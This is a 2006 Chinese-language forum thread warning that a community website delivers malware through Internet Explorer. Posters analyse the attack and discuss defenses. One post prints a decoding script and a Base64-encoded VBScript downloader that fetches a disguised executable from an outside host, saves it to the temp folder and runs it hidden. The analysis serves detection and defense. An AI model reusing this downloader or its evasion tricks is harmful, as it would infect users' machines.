[注意]數碼E社群網站發現病毒






DarkSkyline
2006-11-10, 04:03 PM
FYI.
http://bbs.eztown.com.tw/

連上這個網站後,IE 會自動下載「AdCount.com」這個檔案;AntiVir PersonalEdition Premium 11/10 的病毒碼把它判定為「HEUR/Crypted」(HEUR 前綴代表啟發式偵測,意思是檔案帶有加密/加殼的可疑特徵,並不是某個已知病毒的名稱)~

PS:請大家注意這個網站,沒事的話不要連結,以免中毒~



proll
2006-11-10, 04:56 PM
用Firefox,進去沒有發現什麼

水蜜桃姐姐
2006-11-10, 05:10 PM
我家AntiVir PersonalEditi也有發現毒好恐怖

hn1271n
2006-11-10, 05:11 PM
用Firefox,進去沒有發現什麼

Firefox 的核心和 IE 不同,不支援 IE 的 ActiveX 與 VBScript;這段惡意程式(見下面 hcchen 解碼出來的內容)正是靠 VBScript 建立 ActiveX 物件來下載並執行檔案,所以在 Firefox 上不會觸發。不過這只代表「這一種」攻擊手法對 Firefox 無效,不代表 Firefox 本身沒有其他漏洞可被利用。

基本上可能的話儘量不要使用IE上網

ㄚ一
2006-11-10, 05:32 PM
不喜歡用FF也可以安裝Gecko核心來瀏覽網頁

hcchen
2006-11-10, 08:41 PM
轉址到:


http://www.yyc8.com/script/adcount.do?id=ad002


利用 JavaScript 檔案 CODE.JS 做編碼/解碼:內容先經過 Base64,再由 aa() 函式把字串旋轉還原(把解碼後字串的最後 n 個字元移到最前面)

CODE.JS內容:


// Base64 alphabet (RFC 4648 standard table, "+" and "/" as the last two symbols).
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Reverse lookup for the 128 ASCII codes: the alphabet index of that
// character, or -1 for any code that is not part of the alphabet
// (this includes "=", which the decoder treats as padding separately).
// Built in an IIFE so no loop variable leaks into the global scope.
var base64DecodeChars = (function () {
    var table = [];
    for (var code = 0; code < 128; code++) {
        table.push(base64EncodeChars.indexOf(String.fromCharCode(code)));
    }
    return table;
})();

/**
 * Dispatch helper: type 0 encodes, type 1 decodes, anything else returns
 * the input untouched.
 *
 * The loose (==) comparisons are kept deliberately so that behaviour is
 * unchanged for callers that pass the type as a string ("0" / "1").
 *
 * @param {string} str - text to transform
 * @param {number|string} type - 0 = encode, 1 = decode, other = pass through
 * @returns {string}
 */
function base64(str, type) {
    var wantsEncode = type == 0;
    var wantsDecode = type == 1;
    if (wantsEncode) {
        return base64encode(str);
    }
    if (wantsDecode) {
        return base64decode(str);
    }
    return str;
}

/**
 * Base64-encode a byte string.
 *
 * Each UTF-16 code unit of `str` contributes only its low 8 bits, so the
 * caller is expected to pass a byte string (e.g. the output of utf16to8);
 * code units above 255 are silently truncated.  Output is padded with "="
 * up to a multiple of four characters.  Reads the global
 * base64EncodeChars alphabet.
 *
 * @param {string} str - byte string (code units 0-255)
 * @returns {string} Base64 text
 */
function base64encode(str) {
    var total = str.length;
    var pos = 0;
    var out = "";
    while (pos < total) {
        // Pull up to three bytes; a missing byte reads as 0 and its
        // output position(s) become "=" padding.
        var b0 = str.charCodeAt(pos++) & 0xff;
        var hasB1 = pos < total;
        var b1 = hasB1 ? str.charCodeAt(pos++) & 0xff : 0;
        var hasB2 = pos < total;
        var b2 = hasB2 ? str.charCodeAt(pos++) & 0xff : 0;

        out += base64EncodeChars.charAt(b0 >> 2);
        out += base64EncodeChars.charAt(((b0 & 0x03) << 4) | (b1 >> 4));
        out += hasB1 ? base64EncodeChars.charAt(((b1 & 0x0f) << 2) | (b2 >> 6)) : "=";
        out += hasB2 ? base64EncodeChars.charAt(b2 & 0x3f) : "=";
    }
    return out;
}

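/**
 * Decode Base64 text into a byte string (one char per byte, 0-255).
 *
 * Characters that are not in the alphabet (whitespace, line breaks, any
 * non-ASCII code unit) are skipped.  A "=" in the third or fourth position
 * of a quartet ends decoding and returns what was produced so far; a "="
 * anywhere else is simply skipped.  Input that ends mid-quartet returns
 * the bytes decoded so far.  Reads the global base64DecodeChars table.
 *
 * Fix: the original masked every code unit with 0xff and indexed the
 * 128-entry table with the result, so a non-ASCII character either read
 * past the table (undefined, which then decoded as the value 0) or, for
 * code units above 255, aliased onto a valid alphabet character.  Such
 * characters are now skipped like any other non-alphabet character.
 *
 * @param {string} str - Base64 text
 * @returns {string} decoded byte string
 */
function base64decode(str) {
    var len = str.length;
    var i = 0;
    var out = "";
    var PAD = -2;

    // Return the next alphabet value, skipping non-alphabet characters.
    // Returns -1 when the input is exhausted and PAD when `stopAtPad` is
    // set and a "=" is met.
    function next(stopAtPad) {
        while (i < len) {
            var code = str.charCodeAt(i++);
            if (stopAtPad && code === 61) {
                return PAD;
            }
            // Only ASCII codes index the 128-entry table; anything else is
            // treated as "not in the alphabet" rather than read past the end.
            var value = code < 128 ? base64DecodeChars[code] : -1;
            if (value !== -1) {
                return value;
            }
        }
        return -1;
    }

    while (i < len) {
        var c1 = next(false);
        if (c1 === -1) {
            break;
        }
        var c2 = next(false);
        if (c2 === -1) {
            break;
        }
        out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

        var c3 = next(true);
        if (c3 === PAD) {
            return out;
        }
        if (c3 === -1) {
            break;
        }
        out += String.fromCharCode(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2));

        var c4 = next(true);
        if (c4 === PAD) {
            return out;
        }
        if (c4 === -1) {
            break;
        }
        out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
    }
    return out;
}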

/**
 * Encode a JavaScript (UTF-16) string as a UTF-8 byte string, one char
 * per byte (0-255), suitable for base64encode.
 *
 * Notes on the exact scheme (same as the original):
 *  - U+0001..U+007F are copied as single bytes;
 *  - U+0000 is NOT a single 0x00 byte but the two-byte form C0 80;
 *  - every other code unit, including each half of a surrogate pair, is
 *    encoded on its own as a 2- or 3-byte sequence, so characters above
 *    U+FFFF come out as two 3-byte sequences rather than one 4-byte one.
 * This is the "modified UTF-8" layout also used by Java's writeUTF; the
 * companion utf8to16 in this file reverses it.
 *
 * @param {string} str - text to encode
 * @returns {string} byte string
 */
function utf16to8(str) {
    var bytes = [];
    for (var idx = 0; idx < str.length; idx++) {
        var unit = str.charCodeAt(idx);
        if (unit >= 0x0001 && unit <= 0x007F) {
            // plain ASCII: one byte
            bytes.push(str.charAt(idx));
        } else if (unit > 0x07FF) {
            // 1110xxxx 10xxxxxx 10xxxxxx
            bytes.push(String.fromCharCode(0xE0 | ((unit >> 12) & 0x0F)),
                       String.fromCharCode(0x80 | ((unit >> 6) & 0x3F)),
                       String.fromCharCode(0x80 | (unit & 0x3F)));
        } else {
            // 110xxxxx 10xxxxxx (also used for U+0000)
            bytes.push(String.fromCharCode(0xC0 | ((unit >> 6) & 0x1F)),
                       String.fromCharCode(0x80 | (unit & 0x3F)));
        }
    }
    return bytes.join("");
}

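/**
 * Decode a byte string (one char per byte, 0-255) holding UTF-8 into a
 * normal JavaScript (UTF-16) string.  Inverse of utf16to8 above.
 *
 * 1-, 2- and 3-byte sequences are handled as before.  Fix: 4-byte
 * sequences (U+10000..U+10FFFF) are now decoded into a surrogate pair;
 * previously the lead byte and its continuation bytes were silently
 * dropped.  Stray continuation bytes (0x80-0xBF), invalid lead bytes
 * (0xF8-0xFF) and out-of-range 4-byte sequences are still skipped.
 * Sequences truncated at the end of the input are not validated: the
 * missing bytes read as NaN and contribute zero bits, as in the original.
 *
 * @param {string} str - byte string
 * @returns {string} decoded text
 */
function utf8to16(str) {
    var out = "";
    var i = 0;
    var len = str.length;
    while (i < len) {
        var c = str.charCodeAt(i++);
        switch (c >> 4) {
            case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
                // 0xxxxxxx: ASCII, copy the byte through
                out += str.charAt(i - 1);
                break;
            case 12: case 13:
                // 110xxxxx 10xxxxxx
                var b2 = str.charCodeAt(i++);
                out += String.fromCharCode(((c & 0x1F) << 6) | (b2 & 0x3F));
                break;
            case 14:
                // 1110xxxx 10xxxxxx 10xxxxxx
                var t2 = str.charCodeAt(i++);
                var t3 = str.charCodeAt(i++);
                out += String.fromCharCode(((c & 0x0F) << 12) |
                                           ((t2 & 0x3F) << 6) |
                                           (t3 & 0x3F));
                break;
            case 15:
                // 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx: code point above the BMP
                if ((c & 0xF8) !== 0xF0) {
                    break; // 0xF8-0xFF is not a valid lead byte; drop it as before
                }
                var q2 = str.charCodeAt(i++);
                var q3 = str.charCodeAt(i++);
                var q4 = str.charCodeAt(i++);
                var cp = ((c & 0x07) << 18) | ((q2 & 0x3F) << 12) |
                         ((q3 & 0x3F) << 6) | (q4 & 0x3F);
                if (cp >= 0x10000 && cp <= 0x10FFFF) {
                    cp -= 0x10000;
                    out += String.fromCharCode(0xD800 | (cp >> 10), 0xDC00 | (cp & 0x3FF));
                }
                // overlong or out-of-range 4-byte sequences are dropped
                break;
            // 8-11: continuation byte without a lead byte, dropped
        }
    }
    return out;
}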


/**
 * Form handler for a page with a form named "f": encodes the text in the
 * "source" field (UTF-8 then Base64) into the "output" field, then decodes
 * the "output" field back into the "decode" field as a round-trip check.
 * Reads and writes document.f; returns nothing.
 */
function doit() {
    var form = document.f;
    var encoded = base64encode(utf16to8(form.source.value));
    form.output.value = encoded;
    // Decode from the field, not from the local, so what is shown as
    // decoded is exactly what the output field now holds.
    var roundTrip = utf8to16(base64decode(form.output.value));
    form.decode.value = roundTrip;
}


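/**
 * Base64-decode `str` and rotate the result right by `n` characters, i.e.
 * move the last `n` characters to the front.  In the sample on this page
 * the encoded blob appears to have been stored rotated this way (the
 * script's opening lines show up at the end of the decoded text), and
 * this function undoes it.  Calls base64decode from this file.
 *
 * Fix: the original used substr(len - n) / substr(0, len - n), which for
 * n larger than the decoded length (or negative) produced a truncated
 * string instead of a rotation.  The shift is now reduced modulo the
 * length, so any integer rotates; negative values rotate left.  For
 * 0 <= n <= length the result is unchanged.
 *
 * @param {string} str - Base64 text
 * @param {number} n - rotation amount in characters
 * @returns {string} decoded, rotated byte string ("" for empty input)
 */
function aa(str, n) {
    var decoded = base64decode(str);
    var len = decoded.length;
    if (len === 0) {
        return decoded;
    }
    // Normalise into [0, len) so negatives and over-long shifts still rotate.
    var shift = ((n % len) + len) % len;
    if (shift === 0) {
        return decoded;
    }
    var cut = len - shift;
    return decoded.slice(cut) + decoded.slice(0, cut);
}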


內容(Base64 編碼後的字串;要先用上面的 aa() 解碼並旋轉還原,才會得到可讀的 script):


MiAgPSAiZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiDQogICAgWE1MMSA9ICJNaWMiDQogICAgWE1MMiA9ICJyb3NvZnQuWE1MSFRUUCINCiAgICBBZG9TcWExID0gIkFkb2RiLlMiDQogICAgQWRvU3FhMiA9ICJ0cmVhbSINCiAgICBvR2V0ICAgPSAiR0VUIg0KICAgIGZuYW1lMSA9ICJBZENvdW50LmNvbSINCiAgICBTRk8gICAgPSAiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiDQogICAgU0FwcCAgID0gIlNoZWxsLkFwcGxpY2F0aW9uIg0KICAgIGRsICAgICA9ICJodHRwOi8vd3d3Lnl5YzguY29tL3NjcmlwdC9zcmMvcnNzMi5jc3MiDQogICAgU2V0IGRmID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgib2JqZWN0IikNCiAgICBkZi5zZXRBdHRyaWJ1dGUgImNsYXNzaWQiLCBjbElEMSZjbElEMg0KICAgIFNldCB4ICA9ICBkZi5DcmVhdGVPYmplY3QoWE1MMSZYTUwyLCIiKQ0KICAgIHNldCBTICA9ICBkZi5jcmVhdGVvYmplY3QoQWRvU3FhMSZBZG9TcWEyLCIiKQ0KICAgIFMudHlwZSA9IDENCiAgICB4Lk9wZW4gb0dldCwgZGwsIEZhbHNlDQogICAgeC5TZW5kDQogICAgc2V0IEYgICA9IGRmLmNyZWF0ZW9iamVjdChTRk8sIiIpDQogICAgc2V0IHRtcCA9IEYuR2V0U3BlY2lhbEZvbGRlcigyKQ0KICAgIGZuYW1lMSAgPSBGLkJ1aWxkUGF0aCh0bXAsZm5hbWUxKQ0KICAgIFMub3Blbg0KICAgIFMud3JpdGUgeC5yZXNwb25zZUJvZHkNCiAgICBTLnNhdmV0b2ZpbGUgZm5hbWUxLDINCiAgICBTLmNsb3NlDQogICAgc2V0IFEgID0gZGYuY3JlYXRlb2JqZWN0KFNBcHAsIiIpDQogICAgUS5TaGVsbEV4ZWN1dGUgZm5hbWUxLCIiLCIiLCJvcGVuIiwwDQogICAgPC9zY3JpcHQ+DQogICAgPGhlYWQ+DQogICAgPHRpdGxlPkludGVybmV0IEV4cGxvcmVyPC90aXRsZT4NCiAgICA8L2hlYWQ+PGJvZHk+PC9ib2R5PjwvaHRtbD48aHRtbD4NCiA8c2NyaXB0IGxhbmd1YWdlPSJWQlNjcmlwdCI+DQogICAgb24gZXJyb3IgcmVzdW1lIG5leHQNCiAgICBjbElEMSAgPSAiY2xzaSINCiAgICBjbElE


解碼後的內容是一段 VBScript(開頭是 on error resume next,任何錯誤都會被吞掉、不會有提示),流程大致如下:
1. 用 document.createElement("object") 建立 classid 為 clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 的 ActiveX 物件(這個 CLSID 一般對應 RDS.DataSpace 控制項),再透過它的 CreateObject 取得 Microsoft.XMLHTTP、Adodb.Stream、Scripting.FileSystemObject、Shell.Application;所有類別名稱和 CLSID 都被拆成兩段字串(例如 "Mic" & "rosoft.XMLHTTP"、"clsi" & "d:BD96...")再串接,應該是為了躲避特徵碼比對。
2. 用 XMLHTTP 以 GET 抓 http://www.yyc8.com/script/src/rss2.css,把 responseBody 經由 Adodb.Stream 寫到暫存資料夾(GetSpecialFolder(2)),檔名為 AdCount.com。
3. 用 Shell.Application 的 ShellExecute 以 "open" 方式、視窗狀態 0(隱藏)執行 AdCount.com。
建議檢查該 ActiveX 控制項是否已套用微軟修補或設定 kill bit;只要它不能被 script 建立,這整段就跑不起來。

下載檔案:
rss2.css(沒錯,副檔名就是 .css;但從它被直接 ShellExecute 執行來看,內容應該是 Windows 執行檔,副檔名只是偽裝)

更改後檔名:
adcount.com(存放在使用者的暫存資料夾)


未發現其他現象...

esjustin
2006-11-10, 09:34 PM
剛用IE開,Kaspersky無法偵測:eye: ...

剛剛刪除暫存檔和所有紀錄檔...搜尋了一遍...沒找到rss2.css...

hcchen
2006-11-10, 09:44 PM
諾頓可以依這種行為(把下載內容寫到暫存資料夾後直接執行)攔截。
由於網頁上的程式經過 Base64 編碼和字串旋轉、ActiveX 類別名稱又拆成兩段字串,加上下載檔案用 .css 副檔名偽裝,
應該是躲過特徵碼(比對式)掃描的主因...........

sai7sai
2006-11-11, 12:02 AM
這個網站被植入 iframe 的語法(如下圖),好像尚未清除,真糟糕。
12353

hn1271n
2006-11-11, 11:13 AM
剛用IE開,Kaspersky無法偵測:eye: ...

剛剛刪除暫存檔和所有紀錄檔...搜尋了一遍...沒找到rss2.css...
也許是你已經打了安全補丁(或那個 ActiveX 控制項已被設定 kill bit),所以惡意程式無法進行非法下載。另外,搜尋 rss2.css 找不到是正常的:解碼後的程式會把下載內容改名成 AdCount.com 存到暫存資料夾(%TEMP%),所以請用 Windows 內建的搜尋找 AdCount.com,並直接檢查暫存資料夾;如果都沒有,恭喜你躲過一劫。